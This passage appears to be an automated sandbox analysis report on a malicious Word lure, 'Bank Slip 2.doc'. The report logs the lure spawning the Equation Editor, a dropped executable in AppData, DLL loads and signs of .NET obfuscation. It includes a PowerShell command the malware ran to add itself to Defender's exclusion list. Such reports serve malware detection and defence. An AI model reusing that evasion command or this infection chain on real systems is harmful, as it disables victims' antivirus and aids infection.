            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess created: C:\Users\user\AppData\Roaming\obie8920193.exe "C:\Users\user\AppData\Roaming\obie8920193.exe"
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\obie8920193.exe "C:\Users\user\AppData\Roaming\obie8920193.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\obie8920193.exe"Jump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeProcess created: C:\Users\user\AppData\Roaming\obie8920193.exe "C:\Users\user\AppData\Roaming\obie8920193.exe"Jump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: credssp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ncrypt.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: bcrypt.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: credssp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32Jump to behavior
            Source: Bank Slip 2.LNK.0.drLNK file: ..\..\..\..\..\Desktop\Bank Slip 2.doc
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\AppData\Roaming\obie8920193.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: FcdBUj68lnCbMtB[1].exe.2.dr, OptionsWindow.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: obie8920193.exe.2.dr, OptionsWindow.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, W69GQbvchlGWfxEUg3.cs.Net Code: LjBwfxGmLB5enfYePel System.Reflection.Assembly.Load(byte[])
            Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, W69GQbvchlGWfxEUg3.cs.Net Code: LjBwfxGmLB5enfYePel System.Reflection.Assembly.Load(byte[])
            Source: 5.2.obie8920193.exe.3887310.11.raw.unpack, W69GQbvchlGWfxEUg3.cs.Net Code: LjBwfxGmLB5enfYePel System.Reflection.Assembly.Load(byte[])
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005D5355 push esp; ret 2_2_005D5357
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005D887D push dword ptr [esi+ebp*4-4Eh]; ret 2_2_005D8883
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005CA67E push ecx; iretd 2_2_005CA67F
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005D667A push esp; ret 2_2_005D667B
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005D666A push esp; ret 2_2_005D666B
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005C8F60 push eax; retf 2_2_005C8F61
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005D6319 push ebp; ret 2_2_005D631B
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005D6311 push ebp; ret 2_2_005D6313
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005D4E01 push ebx; ret 2_2_005D4E1B
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005D4E2A push ebx; ret 2_2_005D4E2B
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005D6C25 push esp; ret 2_2_005D6C27
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005D4E22 push ebx; ret 2_2_005D4E23
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005D66D1 push esp; ret 2_2_005D66EB
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005D6ACC push esi; ret 2_2_005D6B2B
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005CA6CE push ecx; iretd 2_2_005CA6CF
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005D6ACA push esi; ret 2_2_005D6ACB
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005C01F4 push eax; retf 2_2_005C01F5
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005D448F push esp; ret 2_2_005D4493
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005CC288 pushad ; retn 005Ch2_2_005CC289
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005D66B0 push esp; ret 2_2_005D66B3
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_005D66AA push esp; ret 2_2_005D66AB
            Source: FcdBUj68lnCbMtB[1].exe.2.drStatic PE information: section name: .text entropy: 7.956474075976922
            Source: obie8920193.exe.2.drStatic PE information: section name: .text entropy: 7.956474075976922
            Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, zSxtCKQlluoBoaYfXp.csHigh entropy of concatenated method names: 'OgnRHMcNY5', 'vmCRol41YF', 'Q0uR2RhZuy', 'zMfRufRBTY', 'fpcRpi2xKw', 'v75RKhYLrv', 'xsjRB7Mp23', 'tHcRw0kPul', 'KRLRIlCq1d', 'dSiRnK2hl9'
            Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, Oas0CkJLP86ncCAk06.csHigh entropy of concatenated method names: 'GHXsAR4r9S', 'lAmsvvVNPG', 'Exds8tG6SW', 'MXGsLTh54W', 'NsusdBgHPI', 'dJas3JNOwr', 'aNBuvWuf7Q8RLhOWve', 'uQ7NenzmOOxcAaLMhk', 'OFfsskh2oO', 'BfAsOteMOw'
            Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, XknLE6sxi0AB9TbxvRc.csHigh entropy of concatenated method names: 'AvfTq0KEyq', 's2yTau8oC7', 'RVqTjUFaYj', 'JoMTrHMPda', 'ob9TENcOTb', 'Sw1TXwCJZ4', 'i8GTN75a3E', 'rAPTHHC7Ww', 'fiEToqdgIj', 'joyT7tuXVm'
            Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, dvDQ8ooxdtG6SWtXGT.csHigh entropy of concatenated method names: 'ERH1rLd988', 'bAw1XTpBDV', 'TKy1HTUH7d', 'eTd1oLjbdV', 'MbZ1d3XUIw', 'sYC13oI7Up', 'EbH10oYBSs', 'boA1Vv6yAi', 'At71TxKAYD', 'm9C1ilIAyy'
            Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, GgKL0Eg5Wkhg2YdC0x.csHigh entropy of concatenated method names: 'IMUTsrQsXJ', 'VeJTOl1CHT', 'TQwTJrpikx', 'GkjTcaLa5u', 'c4yTyTFN2J', 'U8pTkEyOuX', 'PAFTe40vsK', 'qkTVPe19PJ', 'rcVV5qJaJJ', 'lnEVSLrVM4'
            Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, yT6mC6B4fPpfSn1yjG.csHigh entropy of concatenated method names: 'xUhAc6V83P', 'eEaA1XNMYI', 'vbPAeCfRB2', 'bf6egCAcCi', 'aaEez3V0VO', 'dNJAxUGX5V', 'I3nAshrl2E', 'f6kAfxi46V', 'W7dAOc3oni', 'rkiAJx0XHx'
            Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, DPIJJa2JNOwrGoKDAd.csHigh entropy of concatenated method names: 'k3VeWEg6BE', 'jlAeyDgLZW', 'oERekrBOhj', 'TPqeATLDUt', 'e1IevGOKTQ', 'o1VkbBmDax', 'v5RklZ0XhA', 'Ib5kPvxGsJ', 'xGwk5B7rx1', 'FT7kSu5fbr'
            Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, BR4r9SHUAmvVNPGE5t.csHigh entropy of concatenated method names: 'FgWyYS2u0Z', 'AUoyDCKohK', 'vqCyGtCJo4', 'dfey4gBG0p', 'N7aybp4Wuk', 'Iliylj9Q2S', 'L2TyPGrsds', 'e99y5cS2Pg', 'RDoySsTIjB', 'WiCygTnkPk'
            Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, C7Kf5VfB7dASIKDlYf.csHigh entropy of concatenated method names: 'WBVjLQXbf', 'A6nrrJFfH', 'VecXbIrwB', 'LiCN7U1wD', 'EMeoq1cM7', 'Nko77COJB', 'q3X0Zl8iJKdf9jL3mN', 'xfGhmsBIc8kpAyH0kO', 'kHtpQYeZjoIwjqoCkF', 'p5HV4Vvjf'
            Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, w54Wwi7tk9esttsuBg.csHigh entropy of concatenated method names: 'dddkE0mrXt', 'i5ukNS9Ijc', 'T3l1FXYGRg', 'Vma1pu6KWc', 'tEx1KV0sPo', 'zRM16k4Mwx', 'OmO1BYfUCQ', 'NEY1wE7i8E', 'awT1tqXV4E', 'qyv1IfBOkj'
            Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, va4sUbS6hEyNbApReb.csHigh entropy of concatenated method names: 'GK6V2twI8t', 'KomVumiTnw', 'DuAVFIexMn', 'BiXVpFkQn2', 'BfMVYVSBtn', 'BrLVKFywPE', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, D2UDibly6dG7h6hnQq.csHigh entropy of concatenated method names: 'qEM05aRK20', 'Jm50gVOZQq', 'dpiVxjpehW', 'EO9Vsf6VXr', 'qMg0nfFZL0', 'kg10MuDH94', 'pqX0Q7KhQy', 'yga0YAW9bd', 'heB0DashSd', 'QQ30Gj3wYg'
            Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, Qh9yHxsORTqQFMRRqnU.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fSCiYQdVqD', 'UCniDDVHuV', 'Bl9iGAQae4', 'XvLi4Ll8CB', 'jbQibeWikE', 'agFilOQRxC', 'rW0iP7byWG'
            Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, KGQivG4jZoZqi3K2bp.csHigh entropy of concatenated method names: 'zuv08FCj4y', 'iP30LA7YEU', 'ToString', 'p8H0cQJaMf', 'vYL0yc0pPe', 'JEW01mIA5Y', 'xkm0kn33Gr', 'aRs0e4HrQH', 'FJZ0ALR5Py', 'x8Y0vqeFMS'
            Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, W69GQbvchlGWfxEUg3.csHigh entropy of concatenated method names: 'knpOW5nIkU', 'rnCOcoFLu2', 'cTTOyyqFQy', 'qx0O17hsB9', 'Eo6OkBIRGy', 'p1uOelR80E', 'oSAOABkX4v', 'd1COv3GXRm', 'N9cOUPVVkK', 'OjGO8VCNo1'
            Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, c8JUhb5EhV7YevbYMr.csHigh entropy of concatenated method names: 'i5qVciT2dm', 'Hd1VyKoPxa', 'cQiV10G2cQ', 'lYCVkiAPpq', 'pFaVeO1J9R', 'VmmVAKd6jx', 'hgiVvYdhpx', 'UrQVUhBGda', 'mh7V8FlQJC', 'h1qVLkD56K'
            Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, xUxCqCtuE8HCR9gjRX.csHigh entropy of concatenated method names: 'jnCAquX9FD', 'yXqAaV2sHl', 'amTAjCiVrt', 'o8xAryFFEy', 'KvSAEZi7gl', 'bdLAXlHIK5', 'wxkANeL5SP', 'ye8AH5d9Rt', 'DWCAoxP72I', 'X6IA7DsCAp'
            Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, sM5uBfyrWcuZmGJ521.csHigh entropy of concatenated method names: 'Dispose', 'J1lsSfCwkJ', 'Lwffud1nQM', 'piCUUZtDJ4', 'Mf8sgJUhbE', 'xV7szYevbY', 'ProcessDialogKey', 'Prmfxa4sUb', 'KhEfsyNbAp', 'oebff2gKL0'
            Source: 5.2.obie8920193.exe.38e9930.9.raw.unpack, kQMY18YRSxSjPa7Enu.csHigh entropy of concatenated method names: 'qfsdIkUpHl', 'NJNdMENith', 'MW9dYsIKP3', 'k3gdDvQLC7', 'uutdu4L8XF', 'kcddFDdQy7', 'g2OdpWitoC', 'JNNdKxghd0', 'lvCd6ru4f4', 'ArHdBrRQmR'
            Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, zSxtCKQlluoBoaYfXp.csHigh entropy of concatenated method names: 'OgnRHMcNY5', 'vmCRol41YF', 'Q0uR2RhZuy', 'zMfRufRBTY', 'fpcRpi2xKw', 'v75RKhYLrv', 'xsjRB7Mp23', 'tHcRw0kPul', 'KRLRIlCq1d', 'dSiRnK2hl9'
            Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, Oas0CkJLP86ncCAk06.csHigh entropy of concatenated method names: 'GHXsAR4r9S', 'lAmsvvVNPG', 'Exds8tG6SW', 'MXGsLTh54W', 'NsusdBgHPI', 'dJas3JNOwr', 'aNBuvWuf7Q8RLhOWve', 'uQ7NenzmOOxcAaLMhk', 'OFfsskh2oO', 'BfAsOteMOw'
            Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, XknLE6sxi0AB9TbxvRc.csHigh entropy of concatenated method names: 'AvfTq0KEyq', 's2yTau8oC7', 'RVqTjUFaYj', 'JoMTrHMPda', 'ob9TENcOTb', 'Sw1TXwCJZ4', 'i8GTN75a3E', 'rAPTHHC7Ww', 'fiEToqdgIj', 'joyT7tuXVm'
            Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, dvDQ8ooxdtG6SWtXGT.csHigh entropy of concatenated method names: 'ERH1rLd988', 'bAw1XTpBDV', 'TKy1HTUH7d', 'eTd1oLjbdV', 'MbZ1d3XUIw', 'sYC13oI7Up', 'EbH10oYBSs', 'boA1Vv6yAi', 'At71TxKAYD', 'm9C1ilIAyy'
            Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, GgKL0Eg5Wkhg2YdC0x.csHigh entropy of concatenated method names: 'IMUTsrQsXJ', 'VeJTOl1CHT', 'TQwTJrpikx', 'GkjTcaLa5u', 'c4yTyTFN2J', 'U8pTkEyOuX', 'PAFTe40vsK', 'qkTVPe19PJ', 'rcVV5qJaJJ', 'lnEVSLrVM4'
            Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, yT6mC6B4fPpfSn1yjG.csHigh entropy of concatenated method names: 'xUhAc6V83P', 'eEaA1XNMYI', 'vbPAeCfRB2', 'bf6egCAcCi', 'aaEez3V0VO', 'dNJAxUGX5V', 'I3nAshrl2E', 'f6kAfxi46V', 'W7dAOc3oni', 'rkiAJx0XHx'
            Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, DPIJJa2JNOwrGoKDAd.csHigh entropy of concatenated method names: 'k3VeWEg6BE', 'jlAeyDgLZW', 'oERekrBOhj', 'TPqeATLDUt', 'e1IevGOKTQ', 'o1VkbBmDax', 'v5RklZ0XhA', 'Ib5kPvxGsJ', 'xGwk5B7rx1', 'FT7kSu5fbr'
            Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, BR4r9SHUAmvVNPGE5t.csHigh entropy of concatenated method names: 'FgWyYS2u0Z', 'AUoyDCKohK', 'vqCyGtCJo4', 'dfey4gBG0p', 'N7aybp4Wuk', 'Iliylj9Q2S', 'L2TyPGrsds', 'e99y5cS2Pg', 'RDoySsTIjB', 'WiCygTnkPk'
            Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, C7Kf5VfB7dASIKDlYf.csHigh entropy of concatenated method names: 'WBVjLQXbf', 'A6nrrJFfH', 'VecXbIrwB', 'LiCN7U1wD', 'EMeoq1cM7', 'Nko77COJB', 'q3X0Zl8iJKdf9jL3mN', 'xfGhmsBIc8kpAyH0kO', 'kHtpQYeZjoIwjqoCkF', 'p5HV4Vvjf'
            Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, w54Wwi7tk9esttsuBg.csHigh entropy of concatenated method names: 'dddkE0mrXt', 'i5ukNS9Ijc', 'T3l1FXYGRg', 'Vma1pu6KWc', 'tEx1KV0sPo', 'zRM16k4Mwx', 'OmO1BYfUCQ', 'NEY1wE7i8E', 'awT1tqXV4E', 'qyv1IfBOkj'
            Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, va4sUbS6hEyNbApReb.csHigh entropy of concatenated method names: 'GK6V2twI8t', 'KomVumiTnw', 'DuAVFIexMn', 'BiXVpFkQn2', 'BfMVYVSBtn', 'BrLVKFywPE', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, D2UDibly6dG7h6hnQq.csHigh entropy of concatenated method names: 'qEM05aRK20', 'Jm50gVOZQq', 'dpiVxjpehW', 'EO9Vsf6VXr', 'qMg0nfFZL0', 'kg10MuDH94', 'pqX0Q7KhQy', 'yga0YAW9bd', 'heB0DashSd', 'QQ30Gj3wYg'
            Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, Qh9yHxsORTqQFMRRqnU.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fSCiYQdVqD', 'UCniDDVHuV', 'Bl9iGAQae4', 'XvLi4Ll8CB', 'jbQibeWikE', 'agFilOQRxC', 'rW0iP7byWG'
            Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, KGQivG4jZoZqi3K2bp.csHigh entropy of concatenated method names: 'zuv08FCj4y', 'iP30LA7YEU', 'ToString', 'p8H0cQJaMf', 'vYL0yc0pPe', 'JEW01mIA5Y', 'xkm0kn33Gr', 'aRs0e4HrQH', 'FJZ0ALR5Py', 'x8Y0vqeFMS'
            Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, W69GQbvchlGWfxEUg3.csHigh entropy of concatenated method names: 'knpOW5nIkU', 'rnCOcoFLu2', 'cTTOyyqFQy', 'qx0O17hsB9', 'Eo6OkBIRGy', 'p1uOelR80E', 'oSAOABkX4v', 'd1COv3GXRm', 'N9cOUPVVkK', 'OjGO8VCNo1'
            Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, c8JUhb5EhV7YevbYMr.csHigh entropy of concatenated method names: 'i5qVciT2dm', 'Hd1VyKoPxa', 'cQiV10G2cQ', 'lYCVkiAPpq', 'pFaVeO1J9R', 'VmmVAKd6jx', 'hgiVvYdhpx', 'UrQVUhBGda', 'mh7V8FlQJC', 'h1qVLkD56K'
            Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, xUxCqCtuE8HCR9gjRX.csHigh entropy of concatenated method names: 'jnCAquX9FD', 'yXqAaV2sHl', 'amTAjCiVrt', 'o8xAryFFEy', 'KvSAEZi7gl', 'bdLAXlHIK5', 'wxkANeL5SP', 'ye8AH5d9Rt', 'DWCAoxP72I', 'X6IA7DsCAp'
            Source: 5.2.obie8920193.exe.4ea0000.12.raw.unpack, sM5uBfyrWcuZmGJ521.csHigh entropy of concatenated method names: 'Dispose', 'J1lsSfCwkJ', 'Lwffud1nQM', 'piCUUZtDJ4', 'Mf8sgJUhbE', 'xV7szYevbY', 'ProcessDialogKey', 'Prmfxa4sUb', 'KhEfsyNbAp', 'oebff2gKL0'
